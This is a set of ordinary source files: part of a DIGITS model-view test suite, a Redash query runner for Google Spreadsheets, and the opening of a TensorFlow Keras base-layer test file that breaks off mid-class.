            'train_epochs': cls.TRAIN_EPOCHS,
            'random_seed': 0xCAFEBABE,
            'framework': cls.FRAMEWORK,
        }
        if cls.CROP_SIZE is not None:
            data['crop_size'] = cls.CROP_SIZE
        if cls.LR_POLICY is not None:
            data['lr_policy'] = cls.LR_POLICY
        if learning_rate is not None:
            data['learning_rate'] = learning_rate
        data.update(kwargs)

        # 'json' is a flag for this helper, not a form field
        request_json = data.pop('json', False)
        url = '/models/images/generic'
        if request_json:
            url += '.json'

        rv = cls.app.post(url, data=data)

        if request_json:
            if rv.status_code != 200:
                print json.loads(rv.data)
                raise RuntimeError('Model creation failed with %s' % rv.status_code)
            return json.loads(rv.data)['id']

        # expect a redirect
        if not 300 <= rv.status_code <= 310:
            print 'Status code:', rv.status_code
            # surface any flask alert box in the error for easier debugging
            s = BeautifulSoup(rv.data, 'html.parser')
            div = s.select('div.alert-danger')
            if div:
                raise RuntimeError(div[0])
            else:
                raise RuntimeError('Failed to create model')

        job_id = cls.job_id_from_response(rv)
        assert cls.model_exists(job_id), 'model not found after successful creation'
        cls.created_models.append(job_id)
        return job_id
class BaseViewsTestWithModel(BaseViewsTestWithDataset):
    """
    Provides a model

    A model is created once per class and trained to completion before any
    test in the class runs.
    """

    @classmethod
    def setUpClass(cls):
        super(BaseViewsTestWithModel, cls).setUpClass()
        cls.model_id = cls.create_model(json=True)
        status = cls.model_wait_completion(cls.model_id)
        assert status == 'Done', 'create failed'
class BaseTestViews(BaseViewsTest):
    """
    Tests which don't require a dataset or a model
    """

    def test_page_model_new(self):
        # the "new model" page should render
        response = self.app.get('/models/images/generic/new')
        assert response.status_code == 200, 'page load failed with %s' % response.status_code
        assert 'New Image Model' in response.data, 'unexpected page format'

    def test_nonexistent_model(self):
        assert not self.model_exists('foo'), "model shouldn't exist"

    def test_visualize_network(self):
        url = '/models/visualize-network?framework=' + self.FRAMEWORK
        response = self.app.post(url, data={'custom_network': self.network()})
        soup = BeautifulSoup(response.data, 'html.parser')
        if response.status_code != 200:
            page_body = soup.select('body')[0]
            # a GraphViz InvocationException means the tool isn't installed
            if 'InvocationException' in str(page_body):
                raise unittest.SkipTest('GraphViz not installed')
            raise AssertionError('POST failed with %s\n\n%s' % (response.status_code, page_body))
        image = soup.select('img')
        assert image is not None, "didn't return an image"
class BaseTestCreation(BaseViewsTestWithDataset):
    """
    Model creation tests
    """

    def test_create_json(self):
        # create via the JSON API, then abort so the job doesn't train
        job_id = self.create_model(json=True)
        self.abort_model(job_id)

    def test_create_delete(self):
        job_id = self.create_model()
        assert self.delete_model(job_id) == 200, 'delete failed'
        assert not self.model_exists(job_id), 'model exists after delete'

    def test_create_wait_delete(self):
        job_id = self.create_model()
        assert self.model_wait_completion(job_id) == 'Done', 'create failed'
        assert self.delete_model(job_id) == 200, 'delete failed'
        assert not self.model_exists(job_id), 'model exists after delete'

    def test_create_abort_delete(self):
        job_id = self.create_model()
        assert self.abort_model(job_id) == 200, 'abort failed'
        assert self.delete_model(job_id) == 200, 'delete failed'
        assert not self.model_exists(job_id), 'model exists after delete'

    # NOTE(review): the values used in the next two tests look swapped
    # relative to the method names (interval 0.5 in the "_2" test, interval
    # 2 in the "_0_5" test) -- confirm the naming intent.
    def test_snapshot_interval_2(self):
        # snapshot every 0.5 epochs -> more than one snapshot over training
        job_id = self.create_model(snapshot_interval=0.5)
        assert self.model_wait_completion(job_id) == 'Done', 'create failed'
        rv = self.app.get('/models/%s.json' % job_id)
        assert rv.status_code == 200, 'json load failed with %s' % rv.status_code
        content = json.loads(rv.data)
        assert len(content['snapshots']) > 1, 'should take >1 snapshot'

    def test_snapshot_interval_0_5(self):
        # 4 epochs, snapshot every 2 epochs -> exactly 2 snapshots
        job_id = self.create_model(train_epochs=4, snapshot_interval=2)
        assert self.model_wait_completion(job_id) == 'Done', 'create failed'
        rv = self.app.get('/models/%s.json' % job_id)
        assert rv.status_code == 200, 'json load failed with %s' % rv.status_code
        content = json.loads(rv.data)
        assert len(content['snapshots']) == 2, 'should take 2 snapshots'

    @unittest.skipIf(
        not config_value('gpu_list'),
        'no GPUs selected')
    @unittest.skipIf(
        not config_value('caffe_root')['cuda_enabled'],
        'CUDA disabled')
    @unittest.skipIf(
        config_value('caffe_root')['multi_gpu'],
        'multi-GPU enabled')
    def test_select_gpu(self):
        # nose-style generator test: one check per configured GPU
        for index in config_value('gpu_list').split(','):
            yield self.check_select_gpu, index

    def check_select_gpu(self, gpu_index):
        job_id = self.create_model(select_gpu=gpu_index)
        assert self.model_wait_completion(job_id) == 'Done', 'create failed'

    @unittest.skipIf(
        not config_value('gpu_list'),
        'no GPUs selected')
    @unittest.skipIf(
        not config_value('caffe_root')['cuda_enabled'],
        'CUDA disabled')
    @unittest.skipIf(
        not config_value('caffe_root')['multi_gpu'],
        'multi-GPU disabled')
    def test_select_gpus(self):
        # test all possible combinations
        gpu_list = config_value('gpu_list').split(',')
        for i in xrange(len(gpu_list)):
            for combination in itertools.combinations(gpu_list, i+1):
                yield self.check_select_gpus, combination

    def check_select_gpus(self, gpu_list):
        # batch size matches the GPU count so each GPU gets work
        job_id = self.create_model(select_gpus_list=','.join(gpu_list), batch_size=len(gpu_list))
        assert self.model_wait_completion(job_id) == 'Done', 'create failed'

    def infer_one_for_job(self, job_id):
        # carry out one inference test per category in dataset
        image_path = os.path.join(self.imageset_folder, self.test_image)
        with open(image_path,'rb') as infile:
            # StringIO wrapping is needed to simulate POST file upload.
            image_upload = (StringIO(infile.read()), 'image.png')

        rv = self.app.post(
            '/models/images/generic/infer_one?job_id=%s' % job_id,
            data = {
                'image_file': image_upload,
                'show_visualizations': 'y',
            }
        )
        s = BeautifulSoup(rv.data, 'html.parser')
        body = s.select('body')
        assert rv.status_code == 200, 'POST failed with %s\n\n%s' % (rv.status_code, body)

    def test_infer_one_mean_image(self):
        # test the creation
        job_id = self.create_model(use_mean = 'image')
        assert self.model_wait_completion(job_id) == 'Done', 'job failed'
        self.infer_one_for_job(job_id)

    def test_infer_one_mean_pixel(self):
        # test the creation
        job_id = self.create_model(use_mean = 'pixel')
        assert self.model_wait_completion(job_id) == 'Done', 'job failed'
        self.infer_one_for_job(job_id)

    def test_infer_one_mean_none(self):
        # test the creation
        job_id = self.create_model(use_mean = 'none')
        assert self.model_wait_completion(job_id) == 'Done', 'job failed'
        self.infer_one_for_job(job_id)

    def test_retrain(self):
        # train once, then train a second model from the last snapshot
        job1_id = self.create_model()
        assert self.model_wait_completion(job1_id) == 'Done', 'first job failed'
        rv = self.app.get('/models/%s.json' % job1_id)
        assert rv.status_code == 200, 'json load failed with %s' % rv.status_code
        content = json.loads(rv.data)
        assert len(content['snapshots']), 'should have at least snapshot'

        options = {
            'method': 'previous',
            'previous_networks': job1_id,
        }
        options['%s-snapshot' % job1_id] = content['snapshots'][-1]

        job2_id = self.create_model(**options)
        assert self.model_wait_completion(job2_id) == 'Done', 'second job failed'

    def test_retrain_twice(self):
        # retrain from a job which already had a pretrained model
        job1_id = self.create_model()
        assert self.model_wait_completion(job1_id) == 'Done', 'first job failed'
        rv = self.app.get('/models/%s.json' % job1_id)
        assert rv.status_code == 200, 'json load failed with %s' % rv.status_code
        content = json.loads(rv.data)
        assert len(content['snapshots']), 'should have at least snapshot'

        options_2 = {
            'method': 'previous',
            'previous_networks': job1_id,
        }
        options_2['%s-snapshot' % job1_id] = content['snapshots'][-1]
        job2_id = self.create_model(**options_2)
        assert self.model_wait_completion(job2_id) == 'Done', 'second job failed'

        # -1 selects the most recent snapshot
        options_3 = {
            'method': 'previous',
            'previous_networks': job2_id,
        }
        options_3['%s-snapshot' % job2_id] = -1
        job3_id = self.create_model(**options_3)
        assert self.model_wait_completion(job3_id) == 'Done', 'third job failed'

    def test_diverging_network(self):
        if self.FRAMEWORK == 'caffe':
            raise unittest.SkipTest('Test not implemented for Caffe')
        # an absurd learning rate should make training diverge and error out
        job_id = self.create_model(json=True, learning_rate=1e15)
        assert self.model_wait_completion(job_id) == 'Error', 'job should have failed'
        job_info = self.job_info_html(job_id=job_id, job_type='models')
        assert 'Try decreasing your learning rate' in job_info

    def test_clone(self):
        # create a job with many non-default options set ...
        options_1 = {
            'shuffle': True,
            'lr_step_size': 33.0,
            'previous_networks': 'None',
            'lr_inv_power': 0.5,
            'lr_inv_gamma': 0.1,
            'lr_poly_power': 3.0,
            'lr_exp_gamma': 0.95,
            'use_mean': 'image',
            'custom_network_snapshot': '',
            'lr_multistep_gamma': 0.5,
            'lr_policy': 'step',
            'crop_size': None,
            'val_interval': 3.0,
            'random_seed': 123,
            'learning_rate': 0.01,
            'standard_networks': 'None',
            'lr_step_gamma': 0.1,
            'lr_sigmoid_step': 50.0,
            'lr_sigmoid_gamma': 0.1,
            'lr_multistep_values': '50,85',
            'solver_type': 'SGD',
        }
        job1_id = self.create_model(**options_1)
        assert self.model_wait_completion(job1_id) == 'Done', 'first job failed'
        rv = self.app.get('/models/%s.json' % job1_id)
        assert rv.status_code == 200, 'json load failed with %s' % rv.status_code
        content1 = json.loads(rv.data)

        ## Clone job1 as job2
        options_2 = {
            'clone': job1_id,
        }
        job2_id = self.create_model(**options_2)
        assert self.model_wait_completion(job2_id) == 'Done', 'second job failed'
        rv = self.app.get('/models/%s.json' % job2_id)
        assert rv.status_code == 200, 'json load failed with %s' % rv.status_code
        content2 = json.loads(rv.data)

        ## These will be different
        content1.pop('id')
        content2.pop('id')
        content1.pop('directory')
        content2.pop('directory')
        assert (content1 == content2), 'job content does not match'

        job1 = digits.webapp.scheduler.get_job(job1_id)
        job2 = digits.webapp.scheduler.get_job(job2_id)
        assert (job1.form_data == job2.form_data), 'form content does not match'
class BaseTestCreated(BaseViewsTestWithModel):
    """
    Tests on a model that has already been created
    """

    def test_save(self):
        job = digits.webapp.scheduler.get_job(self.model_id)
        assert job.save(), 'Job failed to save'

    def test_download(self):
        # nose-style generator test: one download per archive format
        for extension in ['tar', 'zip', 'tar.gz', 'tar.bz2']:
            yield self.check_download, extension

    def check_download(self, extension):
        url = '/models/%s/download.%s' % (self.model_id, extension)
        rv = self.app.get(url)
        assert rv.status_code == 200, 'download "%s" failed with %s' % (url, rv.status_code)

    def test_index_json(self):
        rv = self.app.get('/index.json')
        assert rv.status_code == 200, 'page load failed with %s' % rv.status_code
        content = json.loads(rv.data)
        # the model created in setUpClass must appear on the index
        found = False
        for m in content['models']:
            if m['id'] == self.model_id:
                found = True
                break
        assert found, 'model not found in list'

    def test_models_page(self):
        rv = self.app.get('/models', follow_redirects=True)
        assert rv.status_code == 200, 'page load failed with %s' % rv.status_code
        assert 'Models' in rv.data, 'unexpected page format'

    def test_model_json(self):
        rv = self.app.get('/models/%s.json' % self.model_id)
        assert rv.status_code == 200, 'page load failed with %s' % rv.status_code
        content = json.loads(rv.data)
        assert content['id'] == self.model_id, 'expected different job_id'
        assert len(content['snapshots']) > 0, 'no snapshots in list'

    def test_edit_name(self):
        # NOTE(review): this edits the dataset job (self.dataset_id), not the
        # model (self.model_id), even though this is a model test class --
        # confirm this is intentional.
        status = self.edit_job(
            self.dataset_id,
            name='new name'
        )
        assert status == 200, 'failed with %s' % status

    def test_edit_notes(self):
        # NOTE(review): same dataset_id/model_id question as test_edit_name.
        status = self.edit_job(
            self.dataset_id,
            notes='new notes'
        )
        assert status == 200, 'failed with %s' % status

    def test_infer_one(self):
        image_path = os.path.join(self.imageset_folder, self.test_image)
        with open(image_path,'rb') as infile:
            # StringIO wrapping is needed to simulate POST file upload.
            image_upload = (StringIO(infile.read()), 'image.png')

        rv = self.app.post(
            '/models/images/generic/infer_one?job_id=%s' % self.model_id,
            data = {
                'image_file': image_upload,
                'show_visualizations': 'y',
            }
        )
        s = BeautifulSoup(rv.data, 'html.parser')
        body = s.select('body')
        assert rv.status_code == 200, 'POST failed with %s\n\n%s' % (rv.status_code, body)

    def test_infer_one_json(self):
        image_path = os.path.join(self.imageset_folder, self.test_image)
        with open(image_path,'rb') as infile:
            # StringIO wrapping is needed to simulate POST file upload.
            image_upload = (StringIO(infile.read()), 'image.png')

        rv = self.app.post(
            '/models/images/generic/infer_one.json?job_id=%s' % self.model_id,
            data = {
                'image_file': image_upload,
            }
        )
        assert rv.status_code == 200, 'POST failed with %s' % rv.status_code
        data = json.loads(rv.data)
        # both regression outputs should be positive for the test image
        assert data['outputs']['output'][0][0] > 0 and \
            data['outputs']['output'][0][1] > 0, \
            'image regression result is wrong: %s' % data['outputs']['output']

    def test_infer_many(self):
        textfile_images = '%s\n' % self.test_image
        # StringIO wrapping is needed to simulate POST file upload.
        file_upload = (StringIO(textfile_images), 'images.txt')
        rv = self.app.post(
            '/models/images/generic/infer_many?job_id=%s' % self.model_id,
            data = {'image_list': file_upload}
        )
        s = BeautifulSoup(rv.data, 'html.parser')
        body = s.select('body')
        assert rv.status_code == 200, 'POST failed with %s\n\n%s' % (rv.status_code, body)
        headers = s.select('table.table th')
        assert headers is not None, 'unrecognized page format'

    def test_infer_many_json(self):
        textfile_images = '%s\n' % self.test_image
        # StringIO wrapping is needed to simulate POST file upload.
        file_upload = (StringIO(textfile_images), 'images.txt')
        rv = self.app.post(
            '/models/images/generic/infer_many.json?job_id=%s' % self.model_id,
            data = {'image_list': file_upload}
        )
        assert rv.status_code == 200, 'POST failed with %s' % rv.status_code
        data = json.loads(rv.data)
        assert 'outputs' in data, 'invalid response'
class BaseTestDatasetModelInteractions(BaseViewsTestWithDataset):
    """
    Test the interactions between datasets and models
    """

    # If you try to create a model using a deleted dataset, it should fail
    def test_create_model_deleted_dataset(self):
        dataset_id = self.create_dataset()
        assert self.delete_dataset(dataset_id) == 200, 'delete failed'
        assert not self.dataset_exists(dataset_id), 'dataset exists after delete'
        try:
            model_id = self.create_model(dataset=dataset_id)
        except RuntimeError:
            # expected: creation must fail for a missing dataset
            return
        assert False, 'Should have failed'

    # If you try to create a model using a running dataset,
    # it should wait to start until the dataset is completed
    def test_create_model_running_dataset(self):
        dataset_id = self.create_dataset()
        model_id = self.create_model(dataset=dataset_id)

        # Model should be in WAIT status while dataset is running
        # Copying functionality from job_wait_completion ...
        start_time = time.time()
        timeout = TIMEOUT_DATASET
        dataset_status = self.dataset_status(dataset_id)
        while dataset_status != 'Done':
            model_status = self.model_status(model_id)
            if model_status == 'Initialized':
                # give it some time ...
                pass
            elif model_status == 'Waiting':
                # That's what we were waiting for
                break
            else:
                raise Exception('Model not waiting - "%s"' % model_status)
            assert (time.time() - start_time) < timeout, 'Job took more than %s seconds' % timeout
            time.sleep(0.5)
            dataset_status = self.dataset_status(dataset_id)

        # Model should switch to RUN status after dataset is DONE
        assert self.dataset_wait_completion(dataset_id) == 'Done', 'dataset creation failed'
        time.sleep(1)
        assert self.model_status(model_id) in ['Running', 'Done'], "model didn't start"
        self.abort_model(model_id)

    # If you try to delete a completed dataset with a dependent model, it should fail
    def test_delete_dataset_dependent_model(self):
        dataset_id = self.create_dataset()
        model_id = self.create_model(dataset=dataset_id)
        assert self.dataset_wait_completion(dataset_id) == 'Done', 'dataset creation failed'
        assert self.delete_dataset(dataset_id) == 403, 'dataset deletion should not have succeeded'
        self.abort_model(model_id)

    # If you try to delete a running dataset with a dependent model, it should fail
    def test_delete_running_dataset_dependent_model(self):
        dataset_id = self.create_dataset()
        model_id = self.create_model(dataset=dataset_id)
        assert self.delete_dataset(dataset_id) == 403, 'dataset deletion should not have succeeded'
        self.abort_dataset(dataset_id)
        self.abort_model(model_id)
class BaseTestCreatedCropInNetwork(BaseTestCreated):
    """Model tests where cropping is requested inside the network definition
    itself (rather than through the model-creation form)."""

    # Caffe network: TRAIN and TEST data layers both apply an 8x8 crop via
    # transform_param, then scale the input and map it to a 2-value output
    # trained with a Euclidean loss.
    CAFFE_NETWORK = \
        """
layer {
name: "data"
type: "Data"
top: "data"
include {
phase: TRAIN
}
transform_param {
crop_size: 8
}
}
layer {
name: "data"
type: "Data"
top: "data"
include {
phase: TEST
}
transform_param {
crop_size: 8
}
}
layer {
name: "scale"
type: "Power"
bottom: "data"
top: "scale"
power_param {
scale: 0.004
}
}
layer {
name: "hidden"
type: "InnerProduct"
bottom: "scale"
top: "output"
inner_product_param {
num_output: 2
}
}
layer {
name: "train_loss"
type: "EuclideanLoss"
bottom: "output"
bottom: "label"
top: "loss"
}
"""

    # Torch (Lua) network: declares croplen = 8 and returns it in the model
    # table so the framework performs the crop; weights zeroed to speed up
    # convergence for this test problem.
    TORCH_NETWORK = \
        """
return function(p)
local croplen = 8, channels
if p.inputShape then channels=p.inputShape[1] else channels=1 end
local net = nn.Sequential()
net:add(nn.MulConstant(0.004))
net:add(nn.View(-1):setNumInputDims(3)) -- flatten
-- set all weights and biases to zero as this speeds learning up
-- for the type of problem we're trying to solve in this test
local linearLayer = nn.Linear(channels*croplen*croplen, 2)
linearLayer.weight:fill(0)
linearLayer.bias:fill(0)
net:add(linearLayer) -- c*croplen*croplen -> 2
return {
model = net,
loss = nn.MSECriterion(),
croplen = croplen
}
end
"""
class BaseTestCreatedCropInForm(BaseTestCreated):
    """Model tests where the crop is requested through the creation form."""

    # 8x8 crop requested via the form field rather than the network text.
    CROP_SIZE = 8
################################################################################
# Test classes
################################################################################

# Concrete per-framework instantiations of the shared base suites above.
# Each class only pins FRAMEWORK; all test logic lives in the base classes.


class TestCaffeViews(BaseTestViews):
    FRAMEWORK = 'caffe'


class TestCaffeCreation(BaseTestCreation):
    FRAMEWORK = 'caffe'


class TestCaffeCreated(BaseTestCreated):
    FRAMEWORK = 'caffe'


class TestCaffeDatasetModelInteractions(BaseTestDatasetModelInteractions):
    FRAMEWORK = 'caffe'


class TestCaffeCreatedCropInNetwork(BaseTestCreatedCropInNetwork):
    FRAMEWORK = 'caffe'


class TestCaffeCreatedCropInForm(BaseTestCreatedCropInForm):
    FRAMEWORK = 'caffe'


class TestTorchViews(BaseTestViews):
    FRAMEWORK = 'torch'


class TestTorchCreation(BaseTestCreation):
    FRAMEWORK = 'torch'


class TestTorchCreated(BaseTestCreated):
    FRAMEWORK = 'torch'


class TestTorchCreatedCropInNetwork(BaseTestCreatedCropInNetwork):
    FRAMEWORK = 'torch'


class TestTorchCreatedCropInForm(BaseTestCreatedCropInForm):
    FRAMEWORK = 'torch'


class TestTorchDatasetModelInteractions(BaseTestDatasetModelInteractions):
    FRAMEWORK = 'torch'
| |
import json
import logging
from base64 import b64decode
from dateutil import parser
from requests import Session
from redash.query_runner import *
from redash.utils import JSONEncoder
logger = logging.getLogger(__name__)
try:
import gspread
from gspread.httpsession import HTTPSession
from oauth2client.service_account import ServiceAccountCredentials
enabled = True
except ImportError:
enabled = False
def _load_key(filename):
    """Read a JSON key file and return the parsed object.

    Uses ``json.load`` to parse straight from the file object instead of
    slurping the bytes and calling ``json.loads`` — same result, no
    intermediate string.
    """
    with open(filename, "rb") as f:
        return json.load(f)
def _guess_type(value):
    """Infer a redash column type for a single cell value.

    Checks, in order: empty string, int, float, boolean literal, datetime;
    anything else is treated as a string.
    """
    if value == '':
        return TYPE_STRING
    try:
        int(value)
    except ValueError:
        pass
    else:
        return TYPE_INTEGER
    try:
        float(value)
    except ValueError:
        pass
    else:
        return TYPE_FLOAT
    if unicode(value).lower() in ('true', 'false'):
        return TYPE_BOOLEAN
    try:
        parser.parse(value)
    except (ValueError, OverflowError):
        pass
    else:
        return TYPE_DATETIME
    return TYPE_STRING
def _value_eval_list(value):
    """Coerce each member of a row to int/float/bool/datetime when possible.

    Mirrors the ordering of `_guess_type`; members that match nothing are
    kept verbatim, and empty/None members become None.
    """
    converted = []
    for member in value:
        if member == '' or member is None:
            converted.append(None)
            continue
        try:
            converted.append(int(member))
            continue
        except ValueError:
            pass
        try:
            converted.append(float(member))
            continue
        except ValueError:
            pass
        lowered = unicode(member).lower()
        if lowered in ('true', 'false'):
            converted.append(lowered == 'true')
            continue
        try:
            converted.append(parser.parse(member))
            continue
        except (ValueError, OverflowError):
            pass
        converted.append(member)
    return converted
HEADER_INDEX = 0
class WorksheetNotFoundError(Exception):
    """Raised when the requested worksheet index is out of range."""

    def __init__(self, worksheet_num, worksheet_count):
        message = (
            "Worksheet number {} not found. Spreadsheet has {} worksheets. "
            "Note that the worksheet count is zero based.".format(
                worksheet_num, worksheet_count))
        super(WorksheetNotFoundError, self).__init__(message)
def parse_worksheet(worksheet):
    """Convert a worksheet (list of rows; first row is the header) into a
    redash ``{'columns': [...], 'rows': [...]}`` dict.

    Column types are guessed from the first data row; duplicate header
    names are disambiguated by appending a counter.
    """
    if not worksheet:
        return {'columns': [], 'rows': []}

    column_names = []
    columns = []
    duplicate_counter = 1
    for j, column_name in enumerate(worksheet[HEADER_INDEX]):
        # BUG FIX: loop until the disambiguated name is actually unique.
        # The old single `if` could rename "a" to "a1" even when a column
        # literally named "a1" already existed, yielding duplicate keys.
        while column_name in column_names:
            column_name = u"{}{}".format(column_name, duplicate_counter)
            duplicate_counter += 1
        column_names.append(column_name)
        columns.append({
            'name': column_name,
            'friendly_name': column_name,
            'type': TYPE_STRING
        })

    if len(worksheet) > 1:
        for j, value in enumerate(worksheet[HEADER_INDEX + 1]):
            # Guard against a first data row longer than the header row,
            # which previously raised IndexError.
            if j < len(columns):
                columns[j]['type'] = _guess_type(value)

    rows = [dict(zip(column_names, _value_eval_list(row)))
            for row in worksheet[HEADER_INDEX + 1:]]
    return {'columns': columns, 'rows': rows}
def parse_spreadsheet(spreadsheet, worksheet_num):
    """Fetch worksheet ``worksheet_num`` (zero-based) and parse its cells.

    Raises WorksheetNotFoundError when the index is past the last sheet.
    """
    available = spreadsheet.worksheets()
    sheet_count = len(available)
    if worksheet_num >= sheet_count:
        raise WorksheetNotFoundError(worksheet_num, sheet_count)
    cells = available[worksheet_num].get_all_values()
    return parse_worksheet(cells)
class TimeoutSession(Session):
    """requests Session that applies a default 300-second timeout when the
    caller did not supply one."""

    def request(self, *args, **kwargs):
        if 'timeout' not in kwargs:
            kwargs['timeout'] = 300
        return super(TimeoutSession, self).request(*args, **kwargs)
class GoogleSpreadsheet(BaseQueryRunner):
    """Query runner that reads a Google Spreadsheet through gspread.

    Query syntax is "<spreadsheet_key>|<worksheet_number>": the worksheet
    number is optional, zero based, and defaults to 0.
    """

    @classmethod
    def annotate_query(cls):
        # The "query" is a spreadsheet key, not SQL — nothing to annotate.
        return False

    @classmethod
    def type(cls):
        return "google_spreadsheets"

    @classmethod
    def enabled(cls):
        # False when gspread/oauth2client failed to import (module top).
        return enabled

    @classmethod
    def configuration_schema(cls):
        return {
            'type': 'object',
            'properties': {
                'jsonKeyFile': {
                    "type": "string",
                    'title': 'JSON Key File'
                }
            },
            'required': ['jsonKeyFile'],
            'secret': ['jsonKeyFile']
        }

    def __init__(self, configuration):
        super(GoogleSpreadsheet, self).__init__(configuration)

    def _get_spreadsheet_service(self):
        # Build an authorized gspread client from the base64-encoded
        # service-account JSON key stored in the data source configuration.
        scope = [
            'https://spreadsheets.google.com/feeds',
        ]
        key = json.loads(b64decode(self.configuration['jsonKeyFile']))
        creds = ServiceAccountCredentials.from_json_keyfile_dict(key, scope)
        # Route gspread's HTTP traffic through a session with a timeout.
        timeout_session = HTTPSession()
        timeout_session.requests_session = TimeoutSession()
        spreadsheetservice = gspread.Client(auth=creds, http_session=timeout_session)
        spreadsheetservice.login()
        return spreadsheetservice

    def test_connection(self):
        # Authenticating is enough to prove the key works.
        self._get_spreadsheet_service()

    def run_query(self, query, user):
        logger.debug("Spreadsheet is about to execute query: %s", query)
        values = query.split("|")
        key = values[0]  # key of the spreadsheet
        worksheet_num = 0 if len(values) != 2 else int(values[1])  # if spreadsheet contains more than one worksheet - this is the number of it

        try:
            spreadsheet_service = self._get_spreadsheet_service()
            spreadsheet = spreadsheet_service.open_by_key(key)

            data = parse_spreadsheet(spreadsheet, worksheet_num)

            json_data = json.dumps(data, cls=JSONEncoder)
            error = None
        except gspread.SpreadsheetNotFound:
            error = "Spreadsheet ({}) not found. Make sure you used correct id.".format(key)
            json_data = None

        return json_data, error
register(GoogleSpreadsheet)
| |
# Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for TensorFlow 2.0 layer behavior."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import copy
import os
import sys
import traceback
import numpy as np
from tensorflow.python.eager import context
from tensorflow.python.eager import def_function
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors_impl
from tensorflow.python.framework import ops
from tensorflow.python.framework import sparse_tensor
from tensorflow.python.framework import tensor_spec
from tensorflow.python.keras import backend
from tensorflow.python.keras import combinations
from tensorflow.python.keras import keras_parameterized
from tensorflow.python.keras import layers
from tensorflow.python.keras import regularizers
from tensorflow.python.keras import testing_utils
from tensorflow.python.keras.engine import base_layer
from tensorflow.python.keras.engine import input_layer
from tensorflow.python.keras.engine import sequential
from tensorflow.python.keras.engine import training as training_lib
from tensorflow.python.keras.mixed_precision.experimental import policy
from tensorflow.python.keras.optimizer_v2 import rmsprop
from tensorflow.python.keras.utils import tf_utils
from tensorflow.python.layers import core as legacy_core
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import state_ops
from tensorflow.python.ops import summary_ops_v2
from tensorflow.python.ops import tensor_array_ops
from tensorflow.python.ops import variables
from tensorflow.python.ops.ragged import ragged_tensor
from tensorflow.python.platform import gfile
from tensorflow.python.platform import test
from tensorflow.python.platform import tf_logging
from tensorflow.python.summary import summary_iterator
from tensorflow.python.util import nest
class DynamicLayer(base_layer.Layer):
  """Layer whose `call` uses a Python loop, so it needs `dynamic=True`."""

  def __init__(self, dynamic=False, **kwargs):
    super(DynamicLayer, self).__init__(dynamic=dynamic, **kwargs)

  def call(self, inputs):
    # Square each sample of the batch through a per-element Python loop.
    squared = tensor_array_ops.TensorArray(
        dtype=dtypes.float32, size=array_ops.shape(inputs)[0])
    for i, sample in enumerate(inputs):
      squared = squared.write(i, math_ops.square(sample))
    return squared.stack()

  def compute_output_shape(self, input_shape):
    return input_shape
class InvalidLayer(base_layer.Layer):
  """Layer whose `call` always raises; used to test error propagation."""

  def call(self, inputs):
    raise ValueError('You did something wrong!')
class BaseLayerTest(keras_parameterized.TestCase):
  """Tests for core base_layer.Layer behavior: dynamic layers, weights,
  naming, configs, and build/shape inference."""

  @combinations.generate(combinations.keras_model_type_combinations())
  def test_dynamic_layer(self):
    model = testing_utils.get_model_from_layers([DynamicLayer(dynamic=True)],
                                                input_shape=(3,))
    self.assertEqual(model.dynamic, True)
    model.compile(rmsprop.RMSprop(0.001), loss='mse')
    self.assertEqual(model.run_eagerly, True)
    model.train_on_batch(np.random.random((2, 3)), np.random.random((2, 3)))

  @combinations.generate(combinations.keras_model_type_combinations())
  def test_dynamic_layer_error(self):
    # DynamicLayer without dynamic=True must fail when traced.
    with self.assertRaisesRegexp(TypeError,
                                 'attempting to use Python control flow'):
      model = testing_utils.get_model_from_layers([DynamicLayer()],
                                                  input_shape=(3,))
      model.compile(rmsprop.RMSprop(0.001), loss='mse')
      model.train_on_batch(np.random.random((2, 3)), np.random.random((2, 3)))

  @combinations.generate(combinations.keras_model_type_combinations())
  def test_dynamic_layer_error_running_in_graph_mode(self):
    with ops.get_default_graph().as_default():
      model = testing_utils.get_model_from_layers([DynamicLayer(dynamic=True)],
                                                  input_shape=(3,))
      self.assertEqual(model.dynamic, True)
      # But then you cannot run the model since you're in a graph scope.
      with self.assertRaisesRegexp(
          ValueError, 'You must enable eager execution'):
        model.compile(rmsprop.RMSprop(0.001), loss='mse')

  def test_manual_compute_output_shape(self):

    class BuildCounter(base_layer.Layer):

      def __init__(self, *args, **kwargs):  # pylint: disable=redefined-outer-name
        super(BuildCounter, self).__init__(*args, **kwargs)
        self.build_counter = 0

      def build(self, input_shape):
        self.build_counter += 1
        self.build_shape = input_shape

      def call(self, inputs):
        return inputs

    layer = BuildCounter(dtype=dtypes.float64)
    output_shape = layer.compute_output_shape((None, 10))
    self.assertEqual(layer.build_counter, 1)
    self.assertEqual(layer.build_shape.as_list(), [None, 10])
    self.assertEqual(output_shape.as_list(), [None, 10])
    output_signature = layer.compute_output_signature(
        tensor_spec.TensorSpec(dtype=dtypes.float64, shape=[None, 10]))
    self.assertEqual(layer.build_counter, 1)
    self.assertEqual(layer.build_shape.as_list(), [None, 10])
    self.assertEqual(output_signature.dtype, dtypes.float64)
    self.assertEqual(output_signature.shape.as_list(), [None, 10])
    # Calling the layer must not trigger a rebuild.
    layer(np.ones((5, 10)))
    self.assertEqual(layer.build_counter, 1)
    self.assertEqual(layer.build_shape.as_list(), [None, 10])

  def test_eager_switch_case_input(self):
    task = input_layer.Input(shape=(), dtype=dtypes.int32)
    control_flow_ops.switch_case(
        task[0], [lambda: constant_op.constant(1.0) for _ in range(10)])

  def test_dynamic_layer_with_deferred_sequential_model(self):
    model = sequential.Sequential([DynamicLayer(dynamic=True), layers.Dense(3)])
    self.assertEqual(model.dynamic, True)
    model.compile(rmsprop.RMSprop(0.001), loss='mse')
    self.assertEqual(model.run_eagerly, True)
    model.train_on_batch(np.random.random((2, 3)), np.random.random((2, 3)))

  def test_nested_dynamic_layers_in_eager_mode(self):
    inputs = input_layer.Input((3,))
    outputs = DynamicLayer(dynamic=True)(inputs)
    inner_model = training_lib.Model(inputs, outputs)
    self.assertEqual(inner_model.dynamic, True)

